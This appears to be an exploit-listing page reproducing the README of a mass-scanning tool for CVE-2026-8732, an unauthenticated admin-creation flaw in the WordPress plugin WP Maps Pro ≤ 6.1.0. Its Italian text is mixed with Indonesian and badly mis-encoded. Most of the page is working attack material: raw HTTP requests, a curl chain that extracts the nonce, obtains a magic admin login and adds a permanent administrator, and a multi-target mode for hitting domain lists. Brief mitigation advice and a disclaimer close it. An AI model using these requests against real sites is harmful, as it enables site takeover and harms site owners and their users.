## https://sploitus.com/exploit?id=KITPLOIT:TOOLS-GITHUB-ZYCODER0DAY-CVE-2026-8732
# βοΈ CVE-2026-8732
### WP Maps Pro β€ 6.1.0 β Escalation dei Privilegi Non Autenticata
   
**Automazione dell'Exploit in 8 Fasi | Multiprocessing + Asyncio | Creazione Admin Verificata**
* * *
## π― Informazioni sulla VulnerabilitΓ
Il plugin WordPress **WP Maps Pro** versione β€ 6.1.0 presenta una vulnerabilitΓ di **escalation dei privilegi senza autenticazione**. Un attaccante senza alcuna credenziale puΓ² creare un account **amministratore** e prendere il controllo del sito.
La vulnerabilitΓ deriva dalla funzionalitΓ "Temporary Access", progettata per il team di supporto del vendor FlipperCode, ma esposta al pubblico senza un'adeguata protezione.
* * *
## π₯ Tre Debolezze Correlate
root@kitploit:~
ββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββ
β KELEMAHAN 1 β Endpoint Terekspos Tanpa Autentikasi β
β βΈ AJAX action didaftarkan dengan wp_ajax_nopriv_ β
β βΈ Siapapun bisa mengakses tanpa login β
ββββββββββββββββββββββββ¬ββββββββββββββββββββββββββββββββββββββββ
β
ββββββββββββββββββββββββΌββββββββββββββββββββββββββββββββββββββββ
β KELEMAHAN 2 β Nonce Bocor di Halaman Publik β
β βΈ Objek wpgmp_local.nonce disematkan di setiap halaman β
β βΈ Penyerang bisa mengekstrak nonce dari HTML source β
ββββββββββββββββββββββββ¬ββββββββββββββββββββββββββββββββββββββββ
β
ββββββββββββββββββββββββΌββββββββββββββββββββββββββββββββββββββββ
β KELEMAHAN 3 β Tidak Ada Pemeriksaan Hak Akses β
β βΈ Fungsi callback hanya memverifikasi nonce β
β βΈ Tidak ada current_user_can() β tidak ada pertahanan lainβ
ββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββ
* * *
## β‘ Catena d'Attacco β 8 Fasi
root@kitploit:~
βββββββββββ ββββββββββββ ββββββββββββ ββββββββββββ
β FASE 1 ββββΆβ FASE 2 ββββΆβ FASE 3 ββββΆβ FASE 4 β
β RESOLVE β β CHECK WP β β DETECT β β VERSION β
β HTTPS? β β wp-contentβ β PLUGIN β β β€6.1.0? β
β HTTP? β β wp-login β β wpgmp_ β β WAF? β
βββββββββββ ββββββββββββ ββββββββββββ βββββββ¬βββββ
β RENTAN
βΌ
ββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββ
β FASE 5 β EKSTRAKSI NONCE β
β β
β GRUP A (API) GRUP B (Konten) GRUP C β
β ββ M1: REST pages ββ M4: Sitemap XML ββ M7: Slug β
β ββ M2: REST search ββ M5: Homepage links Brute β
β ββ M3: rest_route ββ M6: RSS/Atom feed Force β
β β
β Target: wpgmp_local.nonce = "fc-call-nonce" β
ββββββββββββββββββββββββββββ¬ββββββββββββββββββββββββββββββββ
β NONCE DITEMUKAN
βΌ
ββββββββββββ ββββββββββββ ββββββββββββ
β FASE 6 ββββΆβ FASE 7 ββββΆβ FASE 8 β
β EXPLOIT β β VERIFY β β ADD ADMINβ
β POST AJAXβ β Magic URLβ β PERMANEN β
β nonce+ β β Cookie β β REST API β
β check_ β β login β β WP-Admin β
β temp=falseβ β check β β Form β
ββββββββββββ ββββββββββββ ββββββββββββ
β
βΌ
β
ADMIN DIBUAT
Login: wp_xxxx / pass
Role: administrator
### Dettagli di Ogni Fase
* * *
## π οΈ Metodi di Attacco
### Metodo 1: Exploit Principale β Creazione Admin Senza Autenticazione
root@kitploit:~
POST /wp-admin/admin-ajax.php HTTP/1.1
Host: target.com
Content-Type: application/x-www-form-urlencoded
action=wpgmp_temp_access_ajax
nonce=<EKSTRAKSI_NONCE>
check_temp=false
**Risposta se vulnerabile:**
root@kitploit:~
{"url":"https://target.com/?wpgmp_access=abc123def456"}
> Questa magic URL fornisce un **login automatico** come `fc_user_XXXXX` (ruolo: **administrator**).
### Metodo 2: Aggiungi Admin Permanente tramite REST API
root@kitploit:~
POST /wp-json/wp/v2/users HTTP/1.1
Host: target.com
X-WP-Nonce: <REST_NONCE>
Content-Type: application/json
{
"username": "wp_xxxxxxxx",
"email": "user@localhost",
"password": "Str0ng!Pass#2026",
"roles": ["administrator"]
}
### Metodo 3: Aggiungi Admin tramite Modulo WP-Admin (Backup)
root@kitploit:~
POST /wp-admin/user-new.php HTTP/1.1
Host: target.com
Cookie: [admin_cookies]
Content-Type: application/x-www-form-urlencoded
user_login=wp_xxxxxxxx
email=user@localhost
pass1=Str0ng!Pass#2026
pass2=Str0ng!Pass#2026
pw_weak=1 <-- KUNCI: konfirmasi password lemah
role=administrator
createuser=Add New User
_wpnonce_create-user=<NONCE>
> **Punto chiave:** `pw_weak=1` Γ¨ obbligatorio β WordPress rifiuta password deboli senza questo parametro.
* * *
## π Architettura
root@kitploit:~
CVE-2026-8732.py
β
βββ π¦ NonceFinder β Pencari nonce dengan 7 metode
β βββ Grup A (API): M1 REST pages, M2 REST search, M3 rest_route
β βββ Grup B (Konten): M4 Sitemap, M5 Homepage links, M6 RSS feed
β βββ Grup C (Paksa): M7 Slug brute force (30+ slug umum)
β
βββ βοΈ Exploiter β Mesin eksploitasi 8 fase
β βββ resolve() β Fase 1: Pemilihan protokol
β βββ check_wp() β Fase 2: Verifikasi WordPress
β βββ detect_plugin() β Fase 3: Deteksi plugin + early nonce
β βββ detect_version() β Fase 4: Deteksi versi + WAF
β βββ exploit() β Fase 6: Eksploitasi inti
β βββ verify() β Fase 7: Verifikasi login admin
β βββ add_admin() β Fase 8: Tambah admin permanen
β
βββ π§ Worker Process β Proses pekerja multiprocessing
β βββ producer() β Baca domain dari mp.Queue
β βββ consumer() (N) β Eksekusi scan paralel
β
βββ π₯οΈ Scanner β Antarmuka pengguna
βββ single() β Mode target tunggal (interaktif)
βββ multi() β Mode multi-target (massal)
### Flusso di Dati
root@kitploit:~
targets.txt mp.Queue (tugas) asyncio.Queue
βββββββββββ βββββββββββββββββββ ββββββββββββββββββββ
β domain1 βββββΆβ domain queue βββββΆβ internal queue β
β domain2 β β (IPC antara β β (per proses) β
β domain3 β β proses) β ββββββββββ¬ββββββββββ
β ... β βββββββββββββββββββ β
βββββββββββ βββββββββββΌβββββββββββ
β Konsumen (N) β
β Exploiter.scan() β
β 8 fase lengkap β
βββββββββββ¬βββββββββββ
β
βββββββββββΌβββββββββββ
β mp.Queue (hasil) ββββΆ vuln.txt
β + JSON + TXT β + debug.log
ββββββββββββββββββββββ
* * *
## π Utilizzo
### Installazione
root@kitploit:~
pip install aiohttp
### ModalitΓ Target Singolo
root@kitploit:~
python3 CVE-2026-8732.py
root@kitploit:~
[?] Pilih mode:
1. Single Target
2. Multi Target (file list)
> 1
[?] Target domain (tanpa http/https): target.com
[?] Timeout [default: 15]: 15
### ModalitΓ Multi-Target (Massivo)
root@kitploit:~
python3 CVE-2026-8732.py
root@kitploit:~
[?] Pilih mode:
1. Single Target
2. Multi Target (file list)
> 2
[?] Path file target (.txt): targets.txt
[?] Jumlah process [default: 10]: 10
[?] Concurrency per process [default: 50]: 50
[?] Timeout per request [default: 10]: 10
[?] Output file [default: vuln.txt]: vuln.txt
[?] Debug mode? (y/n) [default: n]: y
### Esempio Manuale con curl
root@kitploit:~
# LANGKAH 1: Ekstrak nonce dari halaman frontend
NONCE=$(curl -sk https://target.com/ | grep -oP '"nonce"\s*:\s*"\K[a-f0-9]{10}')
echo "Nonce: $NONCE"
# LANGKAH 2: Kirim payload eksploitasi
RESPONSE=$(curl -sk -X POST https://target.com/wp-admin/admin-ajax.php \
-d "action=wpgmp_temp_access_ajax&nonce=$NONCE&check_temp=false")
echo "Response: $RESPONSE"
# LANGKAH 3: Akses magic URL untuk login sebagai admin
MAGIC_URL=$(echo $RESPONSE | python3 -c "import sys,json; print(json.load(sys.stdin)['url'])")
curl -sk -L -c cookies.txt "$MAGIC_URL"
# LANGKAH 4: Verifikasi akses admin
curl -sk -b cookies.txt https://target.com/wp-admin/profile.php | grep 'id="user_login"'
# LANGKAH 5: Buat admin permanen via REST API atau WP-Admin form
* * *
## π Condizioni di Exploit
L'admin viene creato con successo **SE E SOLO SE** entrambe le condizioni sono soddisfatte:
root@kitploit:~
βββββββββββββββββ βββββββββββββββββ
β KONDISI 1 β ANDβ KONDISI 2 β
β Versi β€6.1.0β β GOLD AKTIF β
β β β β
βββββββββ¬ββββββββ βββββββββ¬ββββββββ
β β
βΌ βΌ
Aksi nopriv WPGMP_Temp_
masih terdaftar Access tersedia
β β
ββββββββββ¬ββββββββββ
βΌ
β
ADMIN DIBUAT
Se la Condizione Fallisce| Risultato
---|---
Versione β₯ 6.1.1| β **CORRETTA** β L'azione `wp_ajax_nopriv_` Γ¨ stata rimossa
GOLD non attivo| β οΈ **PHP CRASH** β La classe `WPGMP_Temp_Access` non esiste
* * *
## π Struttura dei File
root@kitploit:~
CVE-2026-8732/
βββ CVE-2026-8732.py # Skrip eksploitasi otomatis
βββ README.md # Dokumentasi proyek (file ini)
βββ LICENSE # MIT License
* * *
## βοΈ Tecnologie
* * *
## π‘οΈ Mitigazione
Se sei il proprietario di un sito che utilizza WP Maps Pro:
1. **Aggiorna alla versione 6.1.1 o successiva** β Questo correggerΓ la vulnerabilitΓ
2. **Assicurati che l'addon GOLD sia attivo** β Se GOLD Γ¨ installato ma non attivo, il sito rimane in stato vulnerabile (crash durante l'exploit, ma l'azione dannosa resta esposta)
3. **Installa un WAF** (Wordfence / Sucuri) per bloccare le POST verso `admin-ajax.php`
4. **Disabilita l'endpoint REST API users** β Espone l'elenco degli utenti
5. **Limita i tentativi di login** β Previeni il brute-force
* * *
## π Licenza
root@kitploit:~
MIT License
Copyright (c) 2026 XENON1337
Permission is hereby granted, free of charge, to any person obtaining a copy
of this software and associated documentation files (the "Software"), to deal
in the Software without restriction, including without limitation the rights
to use, copy, modify, merge, publish, distribute, sublicense, and/or sell
copies of the Software, and to permit persons to whom the Software is
furnished to do so, subject to the following conditions:
The above copyright notice and this permission notice shall be included in all
copies or substantial portions of the Software.
THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE
SOFTWARE.
* * *
## β οΈ Disclaimer
**QUESTO STRUMENTO Γ SOLO PER USO LEGITTIMO.** Utilizzalo esclusivamente su sistemi di tua proprietΓ o per i quali hai un'autorizzazione esplicita a testare. L'uso senza autorizzazione Γ¨ **ILLEGALE** e **NON ETICO**. L'autore **non Γ¨ responsabile** dell'abuso di questo strumento.
* * *
**Creato daXENON1337**